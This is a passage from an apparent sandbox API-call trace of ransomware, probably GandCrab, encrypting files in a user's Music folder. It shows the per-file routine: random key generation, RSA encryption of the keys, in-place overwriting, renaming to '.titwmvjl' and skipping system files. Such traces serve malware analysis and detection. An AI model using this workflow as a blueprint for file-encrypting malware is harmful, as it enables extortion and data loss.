SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.344] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.348] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.349] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.349] CloseHandle (hObject=0x2b4) returned 1 [0093.349] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\a-jg.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\a-jg.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0093.350] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.350] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.350] lstrcmpW (lpString1="bYWQ.m4a", lpString2=".") returned 1 [0093.350] lstrcmpW (lpString1="bYWQ.m4a", lpString2="..") returned 1 [0093.350] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="bYWQ.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a" [0093.350] lstrlenW (lpString=".titwmvjl") returned 9 [0093.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned 44 [0093.350] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.350] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a.titwmvjl") returned 53 [0093.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned 44 [0093.351] lstrlenW (lpString=".m4a") returned 4 [0093.351] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.351] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0093.351] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0093.351] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned 44 [0093.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned 44 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="desktop.ini") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="autorun.inf") returned 1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="ntuser.dat") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="iconcache.db") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="bootsect.bak") returned 1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="boot.ini") returned 1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="ntuser.dat.log") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="thumbs.db") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="CRAB-DECRYPT.html") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.351] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="ntldr") returned -1 [0093.352] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="NTDETECT.COM") returned -1 [0093.352] lstrcmpiW (lpString1="bYWQ.m4a", lpString2="Bootfont.bin") returned 1 [0093.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a") returned 44 [0093.352] lstrlenW (lpString=".m4a") returned 4 [0093.352] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.352] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.352] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.352] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\bywq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.353] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.353] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.353] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.354] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.354] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.354] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.354] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.354] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.355] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.355] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.355] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.356] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.356] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.356] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.356] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.356] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.356] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.357] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.357] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0093.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.357] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.358] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.358] GetLastError () returned 0x0 [0093.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.358] CryptDestroyKey (hKey=0x5034f8) returned 1 [0093.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.358] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.359] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.359] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0093.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.359] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.359] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.360] GetLastError () returned 0x0 [0093.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.360] CryptDestroyKey (hKey=0x5033b8) returned 1 [0093.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.360] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.360] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x3af9, lpOverlapped=0x0) returned 1 [0093.372] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffc507, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3af9, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x3af9, lpOverlapped=0x0) returned 1 [0093.373] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.374] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.378] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.378] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.378] CloseHandle (hObject=0x2b4) returned 1 [0093.379] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\bywq.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\bYWQ.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\bywq.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0093.382] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.382] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.382] lstrcmpW (lpString1="CwOfBeLcuC8N.wav", lpString2=".") returned 1 [0093.382] lstrcmpW (lpString1="CwOfBeLcuC8N.wav", lpString2="..") returned 1 [0093.382] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="CwOfBeLcuC8N.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav" [0093.382] lstrlenW (lpString=".titwmvjl") returned 9 [0093.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned 52 [0093.382] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.382] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav.titwmvjl") returned 61 [0093.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned 52 [0093.382] lstrlenW (lpString=".wav") returned 4 [0093.382] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.382] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0093.382] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0093.382] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned 52 [0093.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned 52 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="desktop.ini") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="autorun.inf") returned 1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="ntuser.dat") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="iconcache.db") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="bootsect.bak") returned 1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="boot.ini") returned 1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="ntuser.dat.log") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="thumbs.db") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="ntldr") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="NTDETECT.COM") returned -1 [0093.383] lstrcmpiW (lpString1="CwOfBeLcuC8N.wav", lpString2="Bootfont.bin") returned 1 [0093.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav") returned 52 [0093.383] lstrlenW (lpString=".wav") returned 4 [0093.383] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.383] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.383] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.383] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\cwofbelcuc8n.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.384] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.384] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.385] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.385] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.385] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.385] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.385] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.386] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.386] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.386] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.386] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.386] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.386] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.386] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.387] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.387] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.387] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.387] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.387] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.387] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.388] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0093.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.388] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.388] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.388] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.389] GetLastError () returned 0x0 [0093.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.389] CryptDestroyKey (hKey=0x5038f8) returned 1 [0093.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.389] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.389] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.389] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.389] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0093.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.390] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.390] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.390] GetLastError () returned 0x0 [0093.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.390] CryptDestroyKey (hKey=0x5034f8) returned 1 [0093.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.390] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.390] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.391] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.391] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x6783, lpOverlapped=0x0) returned 1 [0093.400] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff987d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6783, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x6783, lpOverlapped=0x0) returned 1 [0093.404] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.405] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.409] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.409] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.409] CloseHandle (hObject=0x2b4) returned 1 [0093.410] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\cwofbelcuc8n.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\CwOfBeLcuC8N.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\cwofbelcuc8n.wav.titwmvjl"), dwFlags=0x1) returned 1 [0093.411] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.411] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.411] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.411] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.411] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock" [0093.411] lstrlenW (lpString=".titwmvjl") returned 9 [0093.411] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock") returned 60 [0093.411] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.411] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 69 [0093.411] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock") returned 60 [0093.411] lstrlenW (lpString=".lock") returned 5 [0093.411] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, 